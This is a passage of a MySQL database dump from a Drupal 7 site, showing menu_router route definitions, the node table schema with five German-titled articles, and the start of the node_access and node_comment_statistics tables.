types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:7:\"default\";}','',123,7,1,'admin/structure/types/manage/%/display','admin/structure/types/manage/%','Default','t','','','a:0:{}',140,'','',-10,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/display/full','a:1:{i:4;s:14:\"node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"node\";i:1;i:4;i:2;s:4:\"full\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:4:\"full\";}','',123,7,1,'admin/structure/types/manage/%/display','admin/structure/types/manage/%','Full content','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/display/rss','a:1:{i:4;s:14:\"node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"node\";i:1;i:4;i:2;s:3:\"rss\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:3:\"rss\";}','',123,7,1,'admin/structure/types/manage/%/display','admin/structure/types/manage/%','RSS','t','','','a:0:{}',132,'','',2,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/display/search_index','a:1:{i:4;s:14:\"node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"node\";i:1;i:4;i:2;s:12:\"search_index\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:12:\"search_index\";}','',123,7,1,'admin/structure/types/manage/%/display','admin/structure/types/manage/%','Search index','t','','','a:0:{}',132,'','',3,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/display/search_result','a:1:{i:4;s:14:\"node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"node\";i:1;i:4;i:2;s:13:\"search_result\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:13:\"search_result\";}','',123,7,1,'admin/structure/types/manage/%/display','admin/structure/types/manage/%','Search result highlighting input','t','','','a:0:{}',132,'','',4,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/display/teaser','a:1:{i:4;s:14:\"node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"node\";i:1;i:4;i:2;s:6:\"teaser\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:6:\"teaser\";}','',123,7,1,'admin/structure/types/manage/%/display','admin/structure/types/manage/%','Teaser','t','','','a:0:{}',132,'','',1,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/edit','a:1:{i:4;s:14:\"node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:14:\"node_type_form\";i:1;i:4;}','',61,6,1,'admin/structure/types/manage/%','admin/structure/types/manage/%','Edit','t','','','a:0:{}',140,'','',0,'modules/node/content_types.inc'),('admin/structure/types/manage/%/fields','a:1:{i:4;s:14:\"node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:3:{i:0;s:28:\"field_ui_field_overview_form\";i:1;s:4:\"node\";i:2;i:4;}','',61,6,1,'admin/structure/types/manage/%','admin/structure/types/manage/%','Manage fields','t','','','a:0:{}',132,'','',1,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/fields/%','a:2:{i:4;a:1:{s:14:\"node_type_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:6;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:6;}','',122,7,0,'','admin/structure/types/manage/%/fields/%','','field_ui_menu_title','a:1:{i:0;i:6;}','','a:0:{}',6,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/fields/%/delete','a:2:{i:4;a:1:{s:14:\"node_type_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:6;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:26:\"field_ui_field_delete_form\";i:1;i:6;}','',245,8,1,'admin/structure/types/manage/%/fields/%','admin/structure/types/manage/%/fields/%','Delete','t','','','a:0:{}',132,'','',10,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/fields/%/edit','a:2:{i:4;a:1:{s:14:\"node_type_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:6;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:6;}','',245,8,1,'admin/structure/types/manage/%/fields/%','admin/structure/types/manage/%/fields/%','Edit','t','','','a:0:{}',140,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/fields/%/field-settings','a:2:{i:4;a:1:{s:14:\"node_type_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:6;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:28:\"field_ui_field_settings_form\";i:1;i:6;}','',245,8,1,'admin/structure/types/manage/%/fields/%','admin/structure/types/manage/%/fields/%','Field settings','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/fields/%/widget-type','a:2:{i:4;a:1:{s:14:\"node_type_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:6;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:25:\"field_ui_widget_type_form\";i:1;i:6;}','',245,8,1,'admin/structure/types/manage/%/fields/%','admin/structure/types/manage/%/fields/%','Widget type','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/tasks','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',3,2,1,'admin','admin','Tasks','t','','','a:0:{}',140,'','',-20,'modules/system/system.admin.inc'),('admin/update/ready','','','update_manager_access','a:0:{}','drupal_get_form','a:1:{i:0;s:32:\"update_manager_update_ready_form\";}','',7,3,0,'','admin/update/ready','Ready to update','t','','','a:0:{}',0,'','',0,'modules/update/update.manager.inc'),('adsense_click','','','1','a:0:{}','adsense_click_register','a:0:{}','',1,1,0,'','adsense_click','','t','','','a:0:{}',0,'','',0,''),('batch','','','1','a:0:{}','system_batch_page','a:0:{}','',1,1,0,'','batch','','t','','_system_batch_theme','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('blog','','','user_access','a:1:{i:0;s:14:\"access content\";}','blog_page_last','a:0:{}','',1,1,0,'','blog','Blogs','t','','','a:0:{}',20,'','',0,'modules/blog/blog.pages.inc'),('blog/%','a:1:{i:1;s:22:\"user_uid_optional_load\";}','a:1:{i:1;s:24:\"user_uid_optional_to_arg\";}','blog_page_user_access','a:1:{i:0;i:1;}','blog_page_user','a:1:{i:0;i:1;}','',2,2,0,'','blog/%','My blog','t','','','a:0:{}',6,'','',0,'modules/blog/blog.pages.inc'),('blog/%/feed','a:1:{i:1;s:9:\"user_load\";}','','blog_page_user_access','a:1:{i:0;i:1;}','blog_feed_user','a:1:{i:0;i:1;}','',5,3,0,'','blog/%/feed','Blogs','t','','','a:0:{}',0,'','',0,'modules/blog/blog.pages.inc'),('blog/feed','','','user_access','a:1:{i:0;s:14:\"access content\";}','blog_feed_last','a:0:{}','',3,2,0,'','blog/feed','Blogs','t','','','a:0:{}',0,'','',0,'modules/blog/blog.pages.inc'),('comment/%','a:1:{i:1;N;}','','user_access','a:1:{i:0;s:15:\"access comments\";}','comment_permalink','a:1:{i:0;i:1;}','',2,2,0,'','comment/%','Comment permalink','t','','','a:0:{}',6,'','',0,''),('comment/%/approve','a:1:{i:1;N;}','','user_access','a:1:{i:0;s:19:\"administer comments\";}','comment_approve','a:1:{i:0;i:1;}','',5,3,0,'','comment/%/approve','Approve','t','','','a:0:{}',6,'','',1,'modules/comment/comment.pages.inc'),('comment/%/delete','a:1:{i:1;N;}','','user_access','a:1:{i:0;s:19:\"administer comments\";}','comment_confirm_delete_page','a:1:{i:0;i:1;}','',5,3,1,'comment/%','comment/%','Delete','t','','','a:0:{}',132,'','',2,'modules/comment/comment.admin.inc'),('comment/%/edit','a:1:{i:1;s:12:\"comment_load\";}','','comment_access','a:2:{i:0;s:4:\"edit\";i:1;i:1;}','comment_edit_page','a:1:{i:0;i:1;}','',5,3,1,'comment/%','comment/%','Edit','t','','','a:0:{}',132,'','',0,''),('comment/%/view','a:1:{i:1;N;}','','user_access','a:1:{i:0;s:15:\"access comments\";}','comment_permalink','a:1:{i:0;i:1;}','',5,3,1,'comment/%','comment/%','View comment','t','','','a:0:{}',140,'','',-10,''),('comment/reply/%','a:1:{i:2;s:9:\"node_load\";}','','node_access','a:2:{i:0;s:4:\"view\";i:1;i:2;}','comment_reply','a:1:{i:0;i:2;}','',6,3,0,'','comment/reply/%','Add new comment','t','','','a:0:{}',6,'','',0,'modules/comment/comment.pages.inc'),('contact','','','user_access','a:1:{i:0;s:29:\"access site-wide contact form\";}','drupal_get_form','a:1:{i:0;s:17:\"contact_site_form\";}','',1,1,0,'','contact','Contact','t','','','a:0:{}',20,'','',0,'modules/contact/contact.pages.inc'),('file/ajax','','','user_access','a:1:{i:0;s:14:\"access content\";}','file_ajax_upload','a:0:{}','ajax_deliver',3,2,0,'','file/ajax','','t','','ajax_base_page_theme','a:0:{}',0,'','',0,''),('file/progress','','','user_access','a:1:{i:0;s:14:\"access content\";}','file_ajax_progress','a:0:{}','',3,2,0,'','file/progress','','t','','ajax_base_page_theme','a:0:{}',0,'','',0,''),('filter/tips','','','1','a:0:{}','filter_tips_long','a:0:{}','',3,2,0,'','filter/tips','Compose tips','t','','','a:0:{}',20,'','',0,'modules/filter/filter.pages.inc'),('filter/tips/%','a:1:{i:2;s:18:\"filter_format_load\";}','','filter_access','a:1:{i:0;i:2;}','filter_tips_long','a:1:{i:0;i:2;}','',6,3,0,'','filter/tips/%','Compose tips','t','','','a:0:{}',6,'','',0,'modules/filter/filter.pages.inc'),('node','','','user_access','a:1:{i:0;s:14:\"access content\";}','node_page_default','a:0:{}','',1,1,0,'','node','','t','','','a:0:{}',0,'','',0,''),('node/%','a:1:{i:1;s:9:\"node_load\";}','','node_access','a:2:{i:0;s:4:\"view\";i:1;i:1;}','node_page_view','a:1:{i:0;i:1;}','',2,2,0,'','node/%','','node_page_title','a:1:{i:0;i:1;}','','a:0:{}',6,'','',0,''),('node/%/delete','a:1:{i:1;s:9:\"node_load\";}','','node_access','a:2:{i:0;s:6:\"delete\";i:1;i:1;}','drupal_get_form','a:2:{i:0;s:19:\"node_delete_confirm\";i:1;i:1;}','',5,3,2,'node/%','node/%','Delete','t','','','a:0:{}',132,'','',1,'modules/node/node.pages.inc'),('node/%/edit','a:1:{i:1;s:9:\"node_load\";}','','node_access','a:2:{i:0;s:6:\"update\";i:1;i:1;}','node_page_edit','a:1:{i:0;i:1;}','',5,3,3,'node/%','node/%','Edit','t','','','a:0:{}',132,'','',0,'modules/node/node.pages.inc'),('node/%/revisions','a:1:{i:1;s:9:\"node_load\";}','','_node_revision_access','a:1:{i:0;i:1;}','node_revision_overview','a:1:{i:0;i:1;}','',5,3,1,'node/%','node/%','Revisions','t','','','a:0:{}',132,'','',2,'modules/node/node.pages.inc'),('node/%/revisions/%/delete','a:2:{i:1;a:1:{s:9:\"node_load\";a:1:{i:0;i:3;}}i:3;N;}','','_node_revision_access','a:2:{i:0;i:1;i:1;s:6:\"delete\";}','drupal_get_form','a:2:{i:0;s:28:\"node_revision_delete_confirm\";i:1;i:1;}','',21,5,0,'','node/%/revisions/%/delete','Delete earlier revision','t','','','a:0:{}',6,'','',0,'modules/node/node.pages.inc'),('node/%/revisions/%/revert','a:2:{i:1;a:1:{s:9:\"node_load\";a:1:{i:0;i:3;}}i:3;N;}','','_node_revision_access','a:2:{i:0;i:1;i:1;s:6:\"update\";}','drupal_get_form','a:2:{i:0;s:28:\"node_revision_revert_confirm\";i:1;i:1;}','',21,5,0,'','node/%/revisions/%/revert','Revert to earlier revision','t','','','a:0:{}',6,'','',0,'modules/node/node.pages.inc'),('node/%/revisions/%/view','a:2:{i:1;a:1:{s:9:\"node_load\";a:1:{i:0;i:3;}}i:3;N;}','','_node_revision_access','a:1:{i:0;i:1;}','node_show','a:2:{i:0;i:1;i:1;b:1;}','',21,5,0,'','node/%/revisions/%/view','Revisions','t','','','a:0:{}',6,'','',0,''),('node/%/track','a:1:{i:1;s:9:\"node_load\";}','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_node_tracker','a:0:{}','',5,3,1,'node/%','node/%','Track','t','','','a:0:{}',132,'','',2,'modules/statistics/statistics.pages.inc'),('node/%/view','a:1:{i:1;s:9:\"node_load\";}','','node_access','a:2:{i:0;s:4:\"view\";i:1;i:1;}','node_page_view','a:1:{i:0;i:1;}','',5,3,1,'node/%','node/%','View','t','','','a:0:{}',140,'','',-10,''),('node/add','','','_node_add_access','a:0:{}','node_add_page','a:0:{}','',3,2,0,'','node/add','Add content','t','','','a:0:{}',6,'','',0,'modules/node/node.pages.inc'),('node/add/article','','','node_access','a:2:{i:0;s:6:\"create\";i:1;s:7:\"article\";}','node_add','a:1:{i:0;s:7:\"article\";}','',7,3,0,'','node/add/article','Article','check_plain','','','a:0:{}',6,'Use articles for time-sensitive content like news, press releases or blog posts.','',0,'modules/node/node.pages.inc'),('node/add/blog','','','node_access','a:2:{i:0;s:6:\"create\";i:1;s:4:\"blog\";}','node_add','a:1:{i:0;s:4:\"blog\";}','',7,3,0,'','node/add/blog','Blog entry','check_plain','','','a:0:{}',6,'Use for multi-user blogs. Every user gets a personal blog.','',0,'modules/node/node.pages.inc'),('node/add/page','','','node_access','a:2:{i:0;s:6:\"create\";i:1;s:4:\"page\";}','node_add','a:1:{i:0;s:4:\"page\";}','',7,3,0,'','node/add/page','Basic page','check_plain','','','a:0:{}',6,'Use basic pages for your static content, such as an \'About us\' page.','',0,'modules/node/node.pages.inc'),('overlay-ajax/%','a:1:{i:1;N;}','','user_access','a:1:{i:0;s:14:\"access overlay\";}','overlay_ajax_render_region','a:1:{i:0;i:1;}','',2,2,0,'','overlay-ajax/%','','t','','','a:0:{}',0,'','',0,''),('overlay/dismiss-message','','','user_access','a:1:{i:0;s:14:\"access overlay\";}','overlay_user_dismiss_message','a:0:{}','',3,2,0,'','overlay/dismiss-message','','t','','','a:0:{}',0,'','',0,''),('rss.xml','','','user_access','a:1:{i:0;s:14:\"access content\";}','node_feed','a:2:{i:0;b:0;i:1;a:0:{}}','',1,1,0,'','rss.xml','RSS feed','t','','','a:0:{}',0,'','',0,''),('search','','','search_is_active','a:0:{}','search_view','a:0:{}','',1,1,0,'','search','Search','t','','','a:0:{}',20,'','',0,'modules/search/search.pages.inc'),('search/node','','','_search_menu_access','a:1:{i:0;s:4:\"node\";}','search_view','a:2:{i:0;s:4:\"node\";i:1;s:0:\"\";}','',3,2,1,'search','search','Content','t','','','a:0:{}',132,'','',-10,'modules/search/search.pages.inc'),('search/node/%','a:1:{i:2;a:1:{s:14:\"menu_tail_load\";a:2:{i:0;s:4:\"%map\";i:1;s:6:\"%index\";}}}','a:1:{i:2;s:16:\"menu_tail_to_arg\";}','_search_menu_access','a:1:{i:0;s:4:\"node\";}','search_view','a:2:{i:0;s:4:\"node\";i:1;i:2;}','',6,3,1,'search/node','search/node/%','Content','t','','','a:0:{}',132,'','',0,'modules/search/search.pages.inc'),('search/user','','','_search_menu_access','a:1:{i:0;s:4:\"user\";}','search_view','a:2:{i:0;s:4:\"user\";i:1;s:0:\"\";}','',3,2,1,'search','search','Users','t','','','a:0:{}',132,'','',0,'modules/search/search.pages.inc'),('search/user/%','a:1:{i:2;a:1:{s:14:\"menu_tail_load\";a:2:{i:0;s:4:\"%map\";i:1;s:6:\"%index\";}}}','a:1:{i:2;s:16:\"menu_tail_to_arg\";}','_search_menu_access','a:1:{i:0;s:4:\"user\";}','search_view','a:2:{i:0;s:4:\"user\";i:1;i:2;}','',6,3,1,'search/node','search/node/%','Users','t','','','a:0:{}',132,'','',0,'modules/search/search.pages.inc'),('sites/default/files/styles/%','a:1:{i:4;s:16:\"image_style_load\";}','','1','a:0:{}','image_style_deliver','a:1:{i:0;i:4;}','',30,5,0,'','sites/default/files/styles/%','Generate image style','t','','','a:0:{}',0,'','',0,''),('system/ajax','','','1','a:0:{}','ajax_form_callback','a:0:{}','ajax_deliver',3,2,0,'','system/ajax','AHAH callback','t','','ajax_base_page_theme','a:0:{}',0,'','',0,'includes/form.inc'),('system/files','','','1','a:0:{}','file_download','a:1:{i:0;s:7:\"private\";}','',3,2,0,'','system/files','File download','t','','','a:0:{}',0,'','',0,''),('system/files/styles/%','a:1:{i:3;s:16:\"image_style_load\";}','','1','a:0:{}','image_style_deliver','a:1:{i:0;i:3;}','',14,4,0,'','system/files/styles/%','Generate image style','t','','','a:0:{}',0,'','',0,''),('system/temporary','','','1','a:0:{}','file_download','a:1:{i:0;s:9:\"temporary\";}','',3,2,0,'','system/temporary','Temporary files','t','','','a:0:{}',0,'','',0,''),('system/timezone','','','1','a:0:{}','system_timezone','a:0:{}','',3,2,0,'','system/timezone','Time zone','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('taxonomy/autocomplete','','','user_access','a:1:{i:0;s:14:\"access content\";}','taxonomy_autocomplete','a:0:{}','',3,2,0,'','taxonomy/autocomplete','Autocomplete taxonomy','t','','','a:0:{}',0,'','',0,'modules/taxonomy/taxonomy.pages.inc'),('taxonomy/term/%','a:1:{i:2;s:18:\"taxonomy_term_load\";}','','user_access','a:1:{i:0;s:14:\"access content\";}','taxonomy_term_page','a:1:{i:0;i:2;}','',6,3,0,'','taxonomy/term/%','Taxonomy term','taxonomy_term_title','a:1:{i:0;i:2;}','','a:0:{}',6,'','',0,'modules/taxonomy/taxonomy.pages.inc'),('taxonomy/term/%/edit','a:1:{i:2;s:18:\"taxonomy_term_load\";}','','taxonomy_term_edit_access','a:1:{i:0;i:2;}','drupal_get_form','a:3:{i:0;s:18:\"taxonomy_form_term\";i:1;i:2;i:2;N;}','',13,4,1,'taxonomy/term/%','taxonomy/term/%','Edit','t','','','a:0:{}',132,'','',10,'modules/taxonomy/taxonomy.admin.inc'),('taxonomy/term/%/feed','a:1:{i:2;s:18:\"taxonomy_term_load\";}','','user_access','a:1:{i:0;s:14:\"access content\";}','taxonomy_term_feed','a:1:{i:0;i:2;}','',13,4,0,'','taxonomy/term/%/feed','Taxonomy term','taxonomy_term_title','a:1:{i:0;i:2;}','','a:0:{}',0,'','',0,'modules/taxonomy/taxonomy.pages.inc'),('taxonomy/term/%/view','a:1:{i:2;s:18:\"taxonomy_term_load\";}','','user_access','a:1:{i:0;s:14:\"access content\";}','taxonomy_term_page','a:1:{i:0;i:2;}','',13,4,1,'taxonomy/term/%','taxonomy/term/%','View','t','','','a:0:{}',140,'','',0,'modules/taxonomy/taxonomy.pages.inc'),('toolbar/toggle','','','user_access','a:1:{i:0;s:14:\"access toolbar\";}','toolbar_toggle_page','a:0:{}','',3,2,0,'','toolbar/toggle','Toggle drawer visibility','t','','','a:0:{}',0,'','',0,''),('user','','','1','a:0:{}','user_page','a:0:{}','',1,1,0,'','user','User account','user_menu_title','','','a:0:{}',6,'','',-10,'modules/user/user.pages.inc'),('user/%','a:1:{i:1;s:9:\"user_load\";}','','user_view_access','a:1:{i:0;i:1;}','user_view_page','a:1:{i:0;i:1;}','',2,2,0,'','user/%','My account','user_page_title','a:1:{i:0;i:1;}','','a:0:{}',6,'','',0,''),('user/%/cancel','a:1:{i:1;s:9:\"user_load\";}','','user_cancel_access','a:1:{i:0;i:1;}','drupal_get_form','a:2:{i:0;s:24:\"user_cancel_confirm_form\";i:1;i:1;}','',5,3,0,'','user/%/cancel','Cancel account','t','','','a:0:{}',6,'','',0,'modules/user/user.pages.inc'),('user/%/cancel/confirm/%/%','a:3:{i:1;s:9:\"user_load\";i:4;N;i:5;N;}','','user_cancel_access','a:1:{i:0;i:1;}','user_cancel_confirm','a:3:{i:0;i:1;i:1;i:4;i:2;i:5;}','',44,6,0,'','user/%/cancel/confirm/%/%','Confirm account cancellation','t','','','a:0:{}',6,'','',0,'modules/user/user.pages.inc'),('user/%/contact','a:1:{i:1;s:9:\"user_load\";}','','_contact_personal_tab_access','a:1:{i:0;i:1;}','drupal_get_form','a:2:{i:0;s:21:\"contact_personal_form\";i:1;i:1;}','',5,3,1,'user/%','user/%','Contact','t','','','a:0:{}',132,'','',2,'modules/contact/contact.pages.inc'),('user/%/edit','a:1:{i:1;s:9:\"user_load\";}','','user_edit_access','a:1:{i:0;i:1;}','drupal_get_form','a:2:{i:0;s:17:\"user_profile_form\";i:1;i:1;}','',5,3,1,'user/%','user/%','Edit','t','','','a:0:{}',132,'','',0,'modules/user/user.pages.inc'),('user/%/edit/account','a:1:{i:1;a:1:{s:18:\"user_category_load\";a:2:{i:0;s:4:\"%map\";i:1;s:6:\"%index\";}}}','','user_edit_access','a:1:{i:0;i:1;}','drupal_get_form','a:2:{i:0;s:17:\"user_profile_form\";i:1;i:1;}','',11,4,1,'user/%/edit','user/%','Account','t','','','a:0:{}',140,'','',0,'modules/user/user.pages.inc'),('user/%/shortcuts','a:1:{i:1;s:9:\"user_load\";}','','shortcut_set_switch_access','a:1:{i:0;i:1;}','drupal_get_form','a:2:{i:0;s:19:\"shortcut_set_switch\";i:1;i:1;}','',5,3,1,'user/%','user/%','Shortcuts','t','','','a:0:{}',132,'','',0,'modules/shortcut/shortcut.admin.inc'),('user/%/track/navigation','a:1:{i:1;s:9:\"user_load\";}','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_user_tracker','a:0:{}','',11,4,1,'user/%','user/%','Track page visits','t','','','a:0:{}',132,'','',2,'modules/statistics/statistics.pages.inc'),('user/%/view','a:1:{i:1;s:9:\"user_load\";}','','user_view_access','a:1:{i:0;i:1;}','user_view_page','a:1:{i:0;i:1;}','',5,3,1,'user/%','user/%','View','t','','','a:0:{}',140,'','',-10,''),('user/autocomplete','','','user_access','a:1:{i:0;s:20:\"access user profiles\";}','user_autocomplete','a:0:{}','',3,2,0,'','user/autocomplete','User autocomplete','t','','','a:0:{}',0,'','',0,'modules/user/user.pages.inc'),('user/login','','','user_is_anonymous','a:0:{}','user_page','a:0:{}','',3,2,1,'user','user','Log in','t','','','a:0:{}',140,'','',0,'modules/user/user.pages.inc'),('user/logout','','','user_is_logged_in','a:0:{}','user_logout','a:0:{}','',3,2,0,'','user/logout','Log out','t','','','a:0:{}',6,'','',10,'modules/user/user.pages.inc'),('user/password','','','1','a:0:{}','drupal_get_form','a:1:{i:0;s:9:\"user_pass\";}','',3,2,1,'user','user','Request new password','t','','','a:0:{}',132,'','',0,'modules/user/user.pages.inc'),('user/register','','','user_register_access','a:0:{}','drupal_get_form','a:1:{i:0;s:18:\"user_register_form\";}','',3,2,1,'user','user','Create new account','t','','','a:0:{}',132,'','',0,''),('user/reset/%/%/%','a:3:{i:2;N;i:3;N;i:4;N;}','','1','a:0:{}','drupal_get_form','a:4:{i:0;s:15:\"user_pass_reset\";i:1;i:2;i:2;i:3;i:3;i:4;}','',24,5,0,'','user/reset/%/%/%','Reset password','t','','','a:0:{}',0,'','',0,'modules/user/user.pages.inc'); /*!40000 ALTER TABLE `menu_router` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `node` -- DROP TABLE IF EXISTS `node`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `node` ( `nid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The primary identifier for a node.', `vid` int(10) unsigned DEFAULT NULL COMMENT 'The current node_revision.vid version identifier.', `type` varchar(32) NOT NULL DEFAULT '' COMMENT 'The node_type.type of this node.', `language` varchar(12) NOT NULL DEFAULT '' COMMENT 'The languages.language of this node.', `title` varchar(255) NOT NULL DEFAULT '' COMMENT 'The title of this node, always treated as non-markup plain text.', `uid` int(11) NOT NULL DEFAULT '0' COMMENT 'The users.uid that owns this node; initially, this is the user that created it.', `status` int(11) NOT NULL DEFAULT '1' COMMENT 'Boolean indicating whether the node is published (visible to non-administrators).', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp when the node was created.', `changed` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp when the node was most recently saved.', `comment` int(11) NOT NULL DEFAULT '0' COMMENT 'Whether comments are allowed on this node: 0 = no, 1 = closed (read only), 2 = open (read/write).', `promote` int(11) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether the node should be displayed on the front page.', `sticky` int(11) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether the node should be displayed at the top of lists in which it appears.', `tnid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The translation set id for this node, which equals the node id of the source post in each set.', `translate` int(11) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this translation page needs to be updated.', PRIMARY KEY (`nid`), UNIQUE KEY `vid` (`vid`), KEY `node_changed` (`changed`), KEY `node_created` (`created`), KEY `node_frontpage` (`promote`,`status`,`sticky`,`created`), KEY `node_status_type` (`status`,`type`,`nid`), KEY `node_title_type` (`title`,`type`(4)), KEY `node_type` (`type`(4)), KEY `uid` (`uid`), KEY `tnid` (`tnid`), KEY `translate` (`translate`), KEY `language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COMMENT='The base table for nodes.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `node` -- LOCK TABLES `node` WRITE; /*!40000 ALTER TABLE `node` DISABLE KEYS */; INSERT INTO `node` VALUES (3,3,'article','und','Allgemeines',1,1,1426851692,1429126003,2,1,0,0,0),(4,4,'article','und','Termine',1,1,1426851954,1446488130,2,0,0,0,0),(5,5,'article','und','Mitgliedschaften',1,1,1426852435,1426852435,2,0,0,0,0),(6,6,'article','und','Anträge',1,1,1428671410,1436793771,2,0,0,0,0),(7,7,'article','und','Freifunk',1,1,1429594218,1442999232,2,0,0,0,0); /*!40000 ALTER TABLE `node` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `node_access` -- DROP TABLE IF EXISTS `node_access`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `node_access` ( `nid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The node.nid this record affects.', `gid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The grant ID a user must possess in the specified realm to gain this row’s privileges on the node.', `realm` varchar(255) NOT NULL DEFAULT '' COMMENT 'The realm in which the user must possess the grant ID. Each node access node can define one or more realms.', `grant_view` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether a user with the realm/grant pair can view this node.', `grant_update` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether a user with the realm/grant pair can edit this node.', `grant_delete` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether a user with the realm/grant pair can delete this node.', PRIMARY KEY (`nid`,`gid`,`realm`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Identifies which realm/grant pairs a user must possess in...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `node_access` -- LOCK TABLES `node_access` WRITE; /*!40000 ALTER TABLE `node_access` DISABLE KEYS */; INSERT INTO `node_access` VALUES (0,0,'all',1,0,0); /*!40000 ALTER TABLE `node_access` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `node_comment_statistics` -- DROP TABLE IF EXISTS `node_comment_statistics`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `node_comment_statistics` ( `nid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The node.nid for which the statistics are compiled.', `cid` int(11) NOT NULL DEFAULT '0' COMMENT 'The comment.cid of the last comment.', `last_comment_timestamp` int(11) NOT NULL DEFAULT '0' 